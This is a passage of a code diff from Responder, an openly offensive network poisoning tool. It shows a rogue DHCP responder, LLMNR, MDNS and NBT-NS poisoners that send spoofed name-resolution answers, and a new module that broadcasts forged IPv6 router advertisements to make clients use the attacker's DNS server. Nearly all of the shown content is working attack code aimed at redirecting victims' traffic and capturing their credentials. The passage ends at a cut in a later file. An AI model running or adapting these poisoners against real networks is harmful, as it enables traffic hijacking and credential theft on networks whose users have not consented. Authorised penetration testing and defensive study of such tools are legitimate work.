+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), DHCPOpCode="\x02", ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate(DHCP_DNS)
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
+                DHCPClient.append(MacAddrStr)
+                SaveDHCPToDb({
+                              'MAC': MacAddrStr, 
+                              'IP': CurrentIP, 
+                              'RequestedIP': IPConv,
+                             })
+                return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
+
+def SendDiscover():
+	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+	IP_Header = IPHead(SrcIP = socket.inet_aton('0.0.0.0').decode('latin-1'), DstIP=socket.inet_aton('255.255.255.255').decode('latin-1'))
+	Packet = DHCPDiscover()
+	Packet.calculate()
+	Buffer = UDP(SrcPort="\x00\x44", DstPort="\x00\x43",Data = Packet)
+	Buffer.calculate()
+	s.sendto(NetworkSendBufferPython2or3(str(IP_Header)+str(Buffer)), ('255.255.255.255', 67))
+
+def SendDHCP(packet,Host):
+	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+	s.sendto(NetworkSendBufferPython2or3(packet), Host)
+
+def DHCP(DHCP_DNS):
+    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
+    s.bind((Interface, 0x0800))
+    SendDiscover()
+    while True:
+            data = s.recvfrom(65535)
+            if data[0][23:24] == b"\x11":# is udp?
+                SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
+                if SrcPort == 67 or DstPort == 67:
+                    ClientIP = socket.inet_ntoa(data[0][26:30])
+                    ret = ParseDHCPCode(data[0][42:], ClientIP,DHCP_DNS)
+                    if ret and not settings.Config.Quiet_Mode:
+                        print(text("[*] [DHCP] %s" % ret))

poisoners/LLMNR.py

@@ -14,32 +14,40 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import struct
-import fingerprint
-
-from packets import LLMNR_Ans
-from SocketServer import BaseRequestHandler
+from packets import LLMNR_Ans, LLMNR6_Ans
 from utils import *
 
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+#Should we answer to those AAAA?
+Have_IPv6 = settings.Config.IPv6
 
 def Parse_LLMNR_Name(data):
-	NameLen = struct.unpack('>B',data[12])[0]
-	return data[13:13+NameLen]
-
+	import codecs
+	NameLen = data[12]
+	if (sys.version_info > (3, 0)):
+		return data[13:13+NameLen]
+	else:
+		NameLen2 = int(codecs.encode(NameLen, 'hex'), 16)
+		return data[13:13+int(NameLen2)]
 
 def IsICMPRedirectPlausible(IP):
 	dnsip = []
-	for line in file('/etc/resolv.conf', 'r'):
-		ip = line.split()
-		if len(ip) < 2:
-		   continue
-		elif ip[0] == 'nameserver':
-			dnsip.extend(ip[1:])
-	for x in dnsip:
-		if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
-			print color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5)
-			print color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5)
-			print color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5)
+	with open('/etc/resolv.conf', 'r') as file:
+		for line in file:
+			ip = line.split()
+			if len(ip) < 2:
+				continue
+			elif ip[0] == 'nameserver':
+				dnsip.extend(ip[1:])
+		for x in dnsip:
+			if x != "127.0.0.1" and IsIPv6IP(x) is False and IsOnTheSameSubnet(x,IP) is False:	#Temp fix to ignore IPv6 DNS addresses
+				print(color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5))
+				print(color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5))
+				print(color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5))
 
 if settings.Config.AnalyzeMode:
 	IsICMPRedirectPlausible(settings.Config.Bind_To)
@@ -47,39 +55,73 @@ if settings.Config.AnalyzeMode:
 
 class LLMNR(BaseRequestHandler):  # LLMNR Server class
 	def handle(self):
-		data, soc = self.request
-		Name = Parse_LLMNR_Name(data)
+		try:
+			data, soc = self.request
+			Name = Parse_LLMNR_Name(data).decode("latin-1")
+			if settings.Config.AnswerName is None:
+				AnswerName = Name
+			else:
+				AnswerName = settings.Config.AnswerName
+			LLMNRType = Parse_IPV6_Addr(data)
 
-		# Break out if we don't want to respond to this host
-		if RespondToThisHost(self.client_address[0], Name) is not True:
-			return None
+			# Break out if we don't want to respond to this host
+			if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True:
+				return None
+			#IPv4
+			if data[2:4] == b'\x00\x00' and LLMNRType:
+				if settings.Config.AnalyzeMode:
+					LineHeader = "[Analyze mode: LLMNR]"
+					# Don't print if in Quiet Mode
+					if not settings.Config.Quiet_Mode:
+						print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
+					SavePoisonersToDb({
+							'Poisoner': 'LLMNR', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '1',
+							})
 
-		if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data):
-			Finger = None
-			if settings.Config.Finger_On_Off:
-				Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
+				elif LLMNRType == True:  # Poisoning Mode
+					#Default:
+					if settings.Config.TTL == None:
+						Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName)
+					else:
+						Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName, TTL=settings.Config.TTL)
+					Buffer1.calculate()
+					soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
+					if not settings.Config.Quiet_Mode:
+						LineHeader = "[*] [LLMNR]"
+						if settings.Config.AnswerName is None:
+							print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
+						else:
+							print(color("%s  Poisoned answer sent to %s for name %s (spoofed answer name %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, AnswerName), 2, 1))
+					SavePoisonersToDb({
+							'Poisoner': 'LLMNR', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '0',
+							})
 
-			if settings.Config.AnalyzeMode:
-				LineHeader = "[Analyze mode: LLMNR]"
-				print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
-                                SavePoisonersToDb({
-			                           'Poisoner': 'LLMNR', 
-			                           'SentToIp': self.client_address[0], 
-			                           'ForName': Name,
-			                           'AnalyzeMode': '1',
-		                                  })
-			else:  # Poisoning Mode
-				Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
-				Buffer.calculate()
-				soc.sendto(str(Buffer), self.client_address)
-				LineHeader = "[*] [LLMNR]"
-				print color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1)
-                                SavePoisonersToDb({
-			                           'Poisoner': 'LLMNR', 
-			                           'SentToIp': self.client_address[0], 
-			                           'ForName': Name,
-			                           'AnalyzeMode': '0',
-		                                  })
-			if Finger is not None:
-				print text("[FINGER] OS Version     : %s" % color(Finger[0], 3))
-				print text("[FINGER] Client Version : %s" % color(Finger[1], 3))
+				elif LLMNRType == 'IPv6' and Have_IPv6:
+					#Default:
+					if settings.Config.TTL == None:
+						Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName)
+					else:
+						Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName, TTL=settings.Config.TTL)
+					Buffer1.calculate()
+					soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
+					if not settings.Config.Quiet_Mode:
+						LineHeader = "[*] [LLMNR]"
+						if settings.Config.AnswerName is None:
+							print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
+						else:
+							print(color("%s  Poisoned answer sent to %s for name %s (spoofed answer name %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, AnswerName), 2, 1))
+					SavePoisonersToDb({
+							'Poisoner': 'LLMNR6', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '0',
+							})
+
+		except:
+			pass

poisoners/MDNS.py

@@ -15,60 +15,98 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import struct
-
-from SocketServer import BaseRequestHandler
-from packets import MDNS_Ans
+import sys
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+from packets import MDNS_Ans, MDNS6_Ans
 from utils import *
 
+#Should we answer to those AAAA?
+Have_IPv6 = settings.Config.IPv6
+
 def Parse_MDNS_Name(data):
 	try:
-		data = data[12:]
-		NameLen = struct.unpack('>B',data[0])[0]
-		Name = data[1:1+NameLen]
-		NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
-		Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
-		return Name+'.'+Name_
+		if (sys.version_info > (3, 0)):
+			data = data[12:]
+			NameLen = data[0]
+			Name = data[1:1+NameLen]
+			NameLen_ = data[1+NameLen]
+			Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
+			FinalName = Name+b'.'+Name_
+			return FinalName.decode("latin-1").replace("\x05","")
+		else:
+			data = NetworkRecvBufferPython2or3(data[12:])
+			NameLen = struct.unpack('>B',data[0])[0]
+			Name = data[1:1+NameLen]
+			NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
+			Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
+			return Name+'.'+Name_.replace("\x05","")
+
 	except IndexError:
 		return None
 
 
 def Poisoned_MDNS_Name(data):
-	data = data[12:]
+	data = NetworkRecvBufferPython2or3(data[12:])
 	return data[:len(data)-5]
 
 class MDNS(BaseRequestHandler):
 	def handle(self):
-		MADDR = "224.0.0.251"
-		MPORT = 5353
-
-		data, soc = self.request
-		Request_Name = Parse_MDNS_Name(data)
-
-		# Break out if we don't want to respond to this host
-		if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True):
-			return None
-
-		if settings.Config.AnalyzeMode:  # Analyze Mode
-			if Parse_IPV6_Addr(data):
-				print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3)))
-                                SavePoisonersToDb({
-			                           'Poisoner': 'MDNS', 
-			                           'SentToIp': self.client_address[0], 
-			                           'ForName': Request_Name,
-			                           'AnalyzeMode': '1',
-		                                  })
-		else:  # Poisoning Mode
-			if Parse_IPV6_Addr(data):
+		try:
+			data, soc = self.request
+			Request_Name = Parse_MDNS_Name(data)
+			MDNSType = Parse_IPV6_Addr(data)
+			# Break out if we don't want to respond to this host
+		
+			if (not Request_Name) or (RespondToThisHost(self.client_address[0].replace("::ffff:",""), Request_Name) is not True):
+				return None
 
+			if settings.Config.AnalyzeMode:  # Analyze Mode
+				# Don't print if in Quiet Mode
+				if not settings.Config.Quiet_Mode:
+					print(text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Request_Name, 3))))
+				SavePoisonersToDb({
+						'Poisoner': 'MDNS', 
+						'SentToIp': self.client_address[0], 
+						'ForName': Request_Name,
+						'AnalyzeMode': '1',
+						})
+			elif MDNSType == True:  # Poisoning Mode
 				Poisoned_Name = Poisoned_MDNS_Name(data)
-				Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=RespondWithIPAton())
+				#Use default:
+				if settings.Config.TTL == None:
+					Buffer = MDNS_Ans(AnswerName = Poisoned_Name)
+				else:
+					Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL)
 				Buffer.calculate()
-				soc.sendto(str(Buffer), (MADDR, MPORT))
+				soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
+				if not settings.Config.Quiet_Mode:
+					print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1))
+				SavePoisonersToDb({
+						'Poisoner': 'MDNS', 
+						'SentToIp': self.client_address[0], 
+						'ForName': Request_Name,
+						'AnalyzeMode': '0',
+						})
 
-				print color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1)
-                                SavePoisonersToDb({
-			                           'Poisoner': 'MDNS', 
-			                           'SentToIp': self.client_address[0], 
-			                           'ForName': Request_Name,
-			                           'AnalyzeMode': '0',
-		                                  })
+			elif MDNSType == 'IPv6' and Have_IPv6:  # Poisoning Mode
+				Poisoned_Name = Poisoned_MDNS_Name(data)
+				#Use default:
+				if settings.Config.TTL == None:
+					Buffer = MDNS6_Ans(AnswerName = Poisoned_Name)
+				else:
+					Buffer = MDNS6_Ans(AnswerName = Poisoned_Name, TTL= settings.Config.TTL)
+				Buffer.calculate()
+				soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
+				if not settings.Config.Quiet_Mode:
+					print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1))
+				SavePoisonersToDb({
+						'Poisoner': 'MDNS6', 
+						'SentToIp': self.client_address[0], 
+						'ForName': Request_Name,
+						'AnalyzeMode': '0',
+						})
+		except:
+			raise

poisoners/NBTNS.py

@@ -14,67 +14,53 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import fingerprint
-
+import sys
 from packets import NBT_Ans
-from SocketServer import BaseRequestHandler
 from utils import *
 
-# Define what are we answering to.
-def Validate_NBT_NS(data):
-	if settings.Config.AnalyzeMode:
-		return False
-	elif NBT_NS_Role(data[43:46]) == "File Server":
-		return True
-	elif settings.Config.NBTNSDomain:
-		if NBT_NS_Role(data[43:46]) == "Domain Controller":
-			return True
-	elif settings.Config.Wredirect:
-		if NBT_NS_Role(data[43:46]) == "Workstation/Redirector":
-			return True
-	return False
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 
 # NBT_NS Server class.
 class NBTNS(BaseRequestHandler):
 
 	def handle(self):
+		try:
+			data, socket = self.request
+			Name = Decode_Name(NetworkRecvBufferPython2or3(data[13:45]))
+			# Break out if we don't want to respond to this host
+			if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True:
+				return None
 
-		data, socket = self.request
-		Name = Decode_Name(data[13:45])
+			if data[2:4] == b'\x01\x10':
+				if settings.Config.AnalyzeMode:  # Analyze Mode
+					# Don't print if in Quiet Mode
+					if not settings.Config.Quiet_Mode:
+						print(text('[Analyze mode: NBT-NS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Name, 3))))
+					SavePoisonersToDb({
+							'Poisoner': 'NBT-NS', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '1',
+							})
+				else:  # Poisoning Mode
+					if settings.Config.TTL == None:
+						Buffer1 = NBT_Ans()
+					else:
+						Buffer1 = NBT_Ans(TTL=settings.Config.TTL)
+					Buffer1.calculate(data)
+					socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
+					if not settings.Config.Quiet_Mode:
+						LineHeader = "[*] [NBT-NS]"
+						print(color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46]))), 2, 1))
+					SavePoisonersToDb({
+							'Poisoner': 'NBT-NS', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '0',
+							})
+		except:
+			raise
 
-		# Break out if we don't want to respond to this host
-		if RespondToThisHost(self.client_address[0], Name) is not True:
-			return None
-
-		if data[2:4] == "\x01\x10":
-			Finger = None
-			if settings.Config.Finger_On_Off:
-				Finger = fingerprint.RunSmbFinger((self.client_address[0],445))
-
-			if settings.Config.AnalyzeMode:  # Analyze Mode
-				LineHeader = "[Analyze mode: NBT-NS]"
-				print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
-                                SavePoisonersToDb({
-			                           'Poisoner': 'NBT-NS', 
-			                           'SentToIp': self.client_address[0], 
-			                           'ForName': Name,
-			                           'AnalyzeMode': '1',
-		                                  })
-			else:  # Poisoning Mode
-				Buffer = NBT_Ans()
-				Buffer.calculate(data)
-				socket.sendto(str(Buffer), self.client_address)
-				LineHeader = "[*] [NBT-NS]"
-
-				print color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(data[43:46])), 2, 1)
-
-                                SavePoisonersToDb({
-			                           'Poisoner': 'NBT-NS', 
-			                           'SentToIp': self.client_address[0], 
-			                           'ForName': Name,
-			                           'AnalyzeMode': '0',
-		                                  })
-
-			if Finger is not None:
-				print text("[FINGER] OS Version     : %s" % color(Finger[0], 3))
-				print text("[FINGER] Client Version : %s" % color(Finger[1], 3))

poisoners/RDNSS.py

@@ -0,0 +1,357 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+"""
+RDNSS/DNSSL Poisoner - DNS Router Advertisement Options (RFC 8106)
+
+Sends IPv6 Router Advertisements with:
+- RDNSS (Recursive DNS Server) option - advertises Responder as DNS server
+- DNSSL (DNS Search List) option - injects DNS search suffix
+
+Both options are independent and can be used separately or together.
+
+This causes IPv6-enabled clients to:
+- Use Responder's DNS server for name resolution (RDNSS)
+- Append search suffix to unqualified names (DNSSL)
+
+Usage:
+    python Responder.py -I eth0 --rdnss -v              # RDNSS only
+    python Responder.py -I eth0 --dnssl corp.local -v   # DNSSL only
+    python Responder.py -I eth0 --rdnss --dnssl corp.local -v  # Both
+"""
+
+import socket
+import struct
+import random
+import time
+import signal
+from utils import *
+
+# ICMPv6 Constants
+ICMPV6_ROUTER_ADVERTISEMENT = 134
+ICMPV6_HOP_LIMIT = 255
+
+# DNS RA Option Types (RFC 8106)
+ND_OPT_RDNSS = 25  # Recursive DNS Server
+ND_OPT_DNSSL = 31  # DNS Search List
+
+# IPv6 All-Nodes Multicast Address
+IPV6_ALL_NODES = "ff02::1"
+
+# RA Timing (seconds)
+RA_INTERVAL_MIN = 30
+RA_INTERVAL_MAX = 120
+RA_LIFETIME = 1800  # 30 minutes
+
+
+class RDNSSOption:
+    """Recursive DNS Server Option (Type 25)"""
+    
+    def __init__(self, dns_servers, lifetime=RA_LIFETIME):
+        self.dns_servers = dns_servers if isinstance(dns_servers, list) else [dns_servers]
+        self.lifetime = lifetime
+    
+    def build(self):
+        if not self.dns_servers:
+            return b''
+        
+        addresses = b''
+        for server in self.dns_servers:
+            addresses += socket.inet_pton(socket.AF_INET6, server)
+        
+        # Length in units of 8 octets: 1 (header) + 2 * num_addresses
+        length = 1 + (2 * len(self.dns_servers))
+        
+        header = struct.pack(
+            '!BBHI',
+            ND_OPT_RDNSS,
+            length,
+            0,              # Reserved
+            self.lifetime
+        )
+        
+        return header + addresses
+
+
+class DNSSLOption:
+    """DNS Search List Option (Type 31)"""
+    
+    def __init__(self, domains, lifetime=RA_LIFETIME):
+        self.domains = domains if isinstance(domains, list) else [domains]
+        self.lifetime = lifetime
+    
+    @staticmethod
+    def encode_domain(domain):
+        """Encode domain name in DNS wire format (RFC 1035)."""
+        encoded = b''
+        for label in domain.rstrip('.').split('.'):
+            label_bytes = label.encode('ascii')
+            encoded += bytes([len(label_bytes)]) + label_bytes
+        encoded += b'\x00'  # Root label
+        return encoded
+    
+    def build(self):
+        if not self.domains:
+            return b''
+        
+        domain_data = b''
+        for domain in self.domains:
+            domain_data += self.encode_domain(domain)
+        
+        # Pad to 8-octet boundary
+        header_size = 8
+        total_size = header_size + len(domain_data)
+        padding_needed = (8 - (total_size % 8)) % 8
+        domain_data += b'\x00' * padding_needed
+        
+        length = (header_size + len(domain_data)) // 8
+        
+        header = struct.pack(
+            '!BBHI',
+            ND_OPT_DNSSL,
+            length,
+            0,              # Reserved
+            self.lifetime
+        )
+        
+        return header + domain_data
+
+
+class RouterAdvertisement:
+    """ICMPv6 Router Advertisement Message"""
+    
+    def __init__(self, rdnss=None, dnssl=None, managed=False, other=False, router_lifetime=0):
+        self.cur_hop_limit = 64
+        self.managed_flag = managed
+        self.other_flag = other
+        self.router_lifetime = router_lifetime  # 0 = not a default router
+        self.reachable_time = 0
+        self.retrans_timer = 0
+        self.rdnss = rdnss
+        self.dnssl = dnssl
+    
+    def build(self):
+        flags = 0
+        if self.managed_flag:
+            flags |= 0x80
+        if self.other_flag:
+            flags |= 0x40
+        
+        ra_header = struct.pack(
+            '!BBHBBHII',
+            ICMPV6_ROUTER_ADVERTISEMENT,
+            0,                          # Code
+            0,                          # Checksum (placeholder)
+            self.cur_hop_limit,
+            flags,
+            self.router_lifetime,
+            self.reachable_time,
+            self.retrans_timer
+        )
+        
+        options = b''
+        if self.rdnss:
+            options += self.rdnss.build()
+        if self.dnssl:
+            options += self.dnssl.build()
+        
+        return ra_header + options
+
+
+def compute_icmpv6_checksum(source, dest, icmpv6_packet):
+    """Compute ICMPv6 checksum including pseudo-header."""
+    src_addr = socket.inet_pton(socket.AF_INET6, source)
+    dst_addr = socket.inet_pton(socket.AF_INET6, dest)
+    
+    pseudo_header = struct.pack(
+        '!16s16sI3xB',
+        src_addr,
+        dst_addr,
+        len(icmpv6_packet),
+        58  # ICMPv6
+    )
+    
+    data = pseudo_header + icmpv6_packet
+    if len(data) % 2:
+        data += b'\x00'
+    
+    checksum = 0
+    for i in range(0, len(data), 2):
+        word = (data[i] << 8) + data[i + 1]
+        checksum += word
+    
+    while checksum >> 16:
+        checksum = (checksum & 0xFFFF) + (checksum >> 16)
+    
+    return ~checksum & 0xFFFF
+
+
+def get_link_local_address(interface):
+    """Get link-local IPv6 address for interface (required for RA source)."""
+    try:
+        with open('/proc/net/if_inet6', 'r') as f:
+            for line in f:
+                parts = line.split()
+                if len(parts) >= 6 and parts[5] == interface:
+                    addr = parts[0]
+                    formatted = ':'.join(addr[i:i+4] for i in range(0, 32, 4))
+                    if formatted.lower().startswith('fe80'):
+                        return formatted
+    except FileNotFoundError:
+        pass
+    
+    # Fallback: try netifaces
+    try:
+        import netifaces
+        addrs = netifaces.ifaddresses(interface)
+        if netifaces.AF_INET6 in addrs:
+            for addr in addrs[netifaces.AF_INET6]:
+                ipv6 = addr.get('addr', '').split('%')[0]
+                if ipv6.lower().startswith('fe80'):
+                    return ipv6
+    except:
+        pass
+    
+    return None
+
+
+def get_dns_server_address(interface):
+    """Get IPv6 address to advertise as DNS server. Uses Bind_To6 from settings."""
+    # Use Bind_To6 from settings (set via -6 option or config)
+    if hasattr(settings.Config, 'Bind_To6') and settings.Config.Bind_To6:
+        return settings.Config.Bind_To6
+    
+    # Fallback: auto-detect from interface
+    try:
+        import netifaces
+        addrs = netifaces.ifaddresses(interface)
+        if netifaces.AF_INET6 in addrs:
+            global_ipv6 = None
+            linklocal_ipv6 = None
+            
+            for addr in addrs[netifaces.AF_INET6]:
+                ipv6 = addr.get('addr', '').split('%')[0]
+                if not ipv6 or ipv6 == '::1':
+                    continue
+                
+                if ipv6.lower().startswith('fe80'):
+                    if not linklocal_ipv6:
+                        linklocal_ipv6 = ipv6
+                else:
+                    if not global_ipv6:
+                        global_ipv6 = ipv6
+            
+            # Prefer global, fall back to link-local
+            return global_ipv6 or linklocal_ipv6
+    except:
+        pass
+    
+    # Last resort: link-local
+    return get_link_local_address(interface)
+
+
+def send_ra(interface, source_ip, dns_server=None, dnssl_domains=None):
+    """Send a single Router Advertisement."""
+    try:
+        # Build RDNSS option if DNS server specified
+        rdnss = None
+        if dns_server:
+            rdnss = RDNSSOption(dns_servers=[dns_server], lifetime=RA_LIFETIME)
+        
+        # Build DNSSL option if domains specified
+        dnssl = None
+        if dnssl_domains:
+            dnssl = DNSSLOption(domains=dnssl_domains, lifetime=RA_LIFETIME)
+        
+        # Build RA packet
+        ra = RouterAdvertisement(rdnss=rdnss, dnssl=dnssl)
+        
+        # Create raw socket
+        sock = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
+        sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, interface.encode())
+        sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ICMPV6_HOP_LIMIT)
+        sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_UNICAST_HOPS, ICMPV6_HOP_LIMIT)
+        
+        # Build packet with checksum
+        packet = bytearray(ra.build())
+        checksum = compute_icmpv6_checksum(source_ip, IPV6_ALL_NODES, bytes(packet))
+        struct.pack_into('!H', packet, 2, checksum)
+        
+        # Send to all-nodes multicast
+        sock.sendto(bytes(packet), (IPV6_ALL_NODES, 0, 0, socket.if_nametoindex(interface)))
+        sock.close()
+        
+        return True
+        
+    except PermissionError:
+        print(color("[!] ", 1, 1) + "RDNSS: Root privileges required for raw sockets")
+        return False
+    except OSError as e:
+        if settings.Config.Verbose:
+            print(color("[!] ", 1, 1) + "RDNSS error: %s" % str(e))
+        return False
+
+
+def RDNSS(interface, rdnss_enabled, dnssl_domain):
+    """
+    RDNSS/DNSSL Poisoner - Main entry point
+    
+    Sends periodic Router Advertisements with DNS options:
+    - RDNSS: Advertises Responder as DNS server (--rdnss)
+    - DNSSL: Injects DNS search suffix (--dnssl)
+    
+    Both options are independent and can be used separately or together.
+    
+    Args:
+        interface: Network interface to send RAs on
+        rdnss_enabled: If True, include RDNSS option (DNS server)
+        dnssl_domain: If set, include DNSSL option (search suffix)
+    """
+    # Get source address (must be link-local for RAs per RFC 4861)
+    source_ip = get_link_local_address(interface)
+    if not source_ip:
+        print(color("[!] ", 1, 1) + "RDNSS: Could not get link-local address for %s" % interface)
+        return
+    
+    # Get DNS server address if RDNSS is enabled
+    dns_server = None
+    if rdnss_enabled:
+        dns_server = get_dns_server_address(interface)
+        if not dns_server:
+            print(color("[!] ", 1, 1) + "RDNSS: Could not determine IPv6 address for DNS server")
+            return
+    
+    # Format DNSSL domain
+    domains = None
+    if dnssl_domain:
+        domains = [dnssl_domain] if isinstance(dnssl_domain, str) else dnssl_domain
+    
+    # Startup messages
+    if dns_server:
+        print(color("[*] ", 2, 1) + "RDNSS advertising DNS server: %s" % dns_server)
+    if domains:
+        print(color("[*] ", 2, 1) + "DNSSL advertising search domain: %s" % ', '.join(domains))
+    print(color("[*] ", 2, 1) + "Sending RA every %d-%d seconds" % (RA_INTERVAL_MIN, RA_INTERVAL_MAX))
+    print(color("[*] ", 2, 1) + "Avoid self poisoning with: \"sudo ip6tables -A INPUT -p icmpv6 --icmpv6-type router-advertisement -j DROP\"")
+    
+    # Send initial RA
+    send_ra(interface, source_ip, dns_server, domains)
+    
+    # Main loop - send RAs at random intervals
+    while True:
+        interval = random.randint(RA_INTERVAL_MIN, RA_INTERVAL_MAX)
+        time.sleep(interval)
+        send_ra(interface, source_ip, dns_server, domains)

pyproject.toml

@@ -0,0 +1,30 @@
+[build-system]
+requires = ["pdm-backend >= 2.4.0"]
+build-backend = "pdm.backend"
+
+[project]
+name = "Responder-poisoner" # "responder" is already taken
+description = "LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication."
+readme = "README.md"
+license = "GPL-3.0-only"
+license-files = ["LICENSE"]
+dynamic = ["version"]
+dependencies = ["aioquic", "netifaces>=0.10.4"]
+classifiers = [
+    "Operating System :: MacOS",
+    "Operating System :: POSIX :: Linux",
+    "Topic :: Security"
+]
+
+[project.urls]
+Homepage = "https://github.com/lgandx/Responder"
+Issues = "https://github.com/lgandx/Responder/issues"
+
+[project.scripts]
+responder = "Responder:main"
+
+[tool.pdm.build]
+includes = ["*.py", "files/", "poisoners/", "servers/", "certs/", "tools/", "Responder.conf"]
+
+[tool.pdm.version]
+source = "scm"

requirements.txt

@@ -0,0 +1,2 @@
+aioquic
+netifaces>=0.10.4

servers/Browser.py

@@ -14,40 +14,43 @@
 #
 # You should have received a copy of the GNU General Public License
